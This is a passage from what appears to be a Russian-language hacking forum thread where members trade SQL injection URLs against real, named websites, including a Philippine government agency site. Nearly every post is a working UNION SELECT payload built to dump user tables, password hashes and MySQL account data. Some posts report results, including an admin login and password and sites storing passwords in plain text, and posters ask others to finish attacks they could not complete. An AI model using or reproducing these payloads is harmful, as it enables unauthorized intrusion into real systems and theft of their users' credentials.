+1 - 5 версия. Вывод данных: Code: http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(nickname,char(58),email,char(58),passwd),3%20from%20forum_users/* Code: http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user_login,char(58),user_email,char(58),user_pass),3%20from%20users_ru/* Code: http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat_ws(char(58),absnum,level,position,name,alias,approved,description),3%20from%20admins/*
Code: http://mp3-portal.p8.ru/showlyric.php?id=-1'+union+select+1,2,convert(concat(user,0x3a,password)+using+cp1251),4,5,6,7+from+mysql.user/*&char=193 хеши mysql-5, версия 4.1* =)
Вот Code: http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/* Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!
Вот, погуглил немного: Code: http://www.tectonic.co.za/view.php?id=99999999+union+select+1,concat(char(39,60,104,51,62,39),username,0x3a,password,0x3a,email),3,4+from+users http://intercar.com.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,3,4 http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,2,3,4,5,6 Здесь админку не могу найти. Есть cpanel, тока к нему не подходит =\ Code: http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users&lng=ua user: admin pass: repz Если что-то уже было - ссори за боян
Code: http://www.minton.com.tr/html/urun.asp?urun=456465+union+select есть такая фирма у турок: Minton называется гы. Не смог тейбл подобрать
Code: http://www.bonus.ru/video/index.phtml?film_id=999999999+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11/* ------------- Code: http://film.topd.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(database(),char(58),user(),char(58),version()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* ------------- Code: http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11,12/* http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(user,char(58),password),char),4,5,6,7,8,9,10,11,12+from+mysql.user/* ------------- Code: http://www.natc.ru/clubs/forsazh/paper/?view=true&id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10,11,12,13,14/* ------------- Code: http://teo.poliglos.info/main.php?id='+union+select+concat(database(),char(58),user(),char(58),version())/* Интересных таблиц не нашел: Code: http://teo.poliglos.info/main.php?id='+union+select+table_name+from+information_schema.tables+limit+45,1/*
Code: http://www.apahelpcenter.org/articles/article.php?id=-123+union+select+1,version(),user(),4,5/* P.S. заюзал антибоян только щас... скуля-боян.
Department of Social Welfare and Development DSWD Bldg., Constitution Hills, Batasan Complex, Q.C., Philippines Code: http://www.dswd.gov.ph/faqdetails.php?id=-1 union select 1,concat(user,CHAR(64),host,CHAR(58), password),3,4,5,6 from mysql.user/*
ХЭttp://tik.ru/pages/search.php?search=%27 Code: TABLE_NAME: tik_pages tik_users Code: TABLE_STRUCT (tik_users): 1, 2, 3, pass, login, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18 Интересная игрушка Дыры множественные в разных скриптах, в том числе межсайтовый скриптинг, инъекции.
sql-inj Коррозия Металла http://www.korroziametalla.com/ уязвимость: http://www.korroziametalla.com/news_arh.php?year=2007&id=49' -> mysql 5 смотрим таблицы стандартными средствами пятой версии: находим обращаем внимание на kor_forum и kor_admin. смотрим колонки аналогичным образом, потом смотрим в них и видим логин/пароль, пароль в незашифрованном виде админка
Code: http://www.dubovoe.ru/print.php?news_id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15/* Code: http://campus4.best-host.ru/index.php?news=-1+union+select+1,2,3,4,5/*
Админку найти несмог(, хеши это md5 урезаные до 30 символов, у первых 6 человек один и тот же пароль 123(ещё бы знать его куда воткнуть ), дальше несмотрел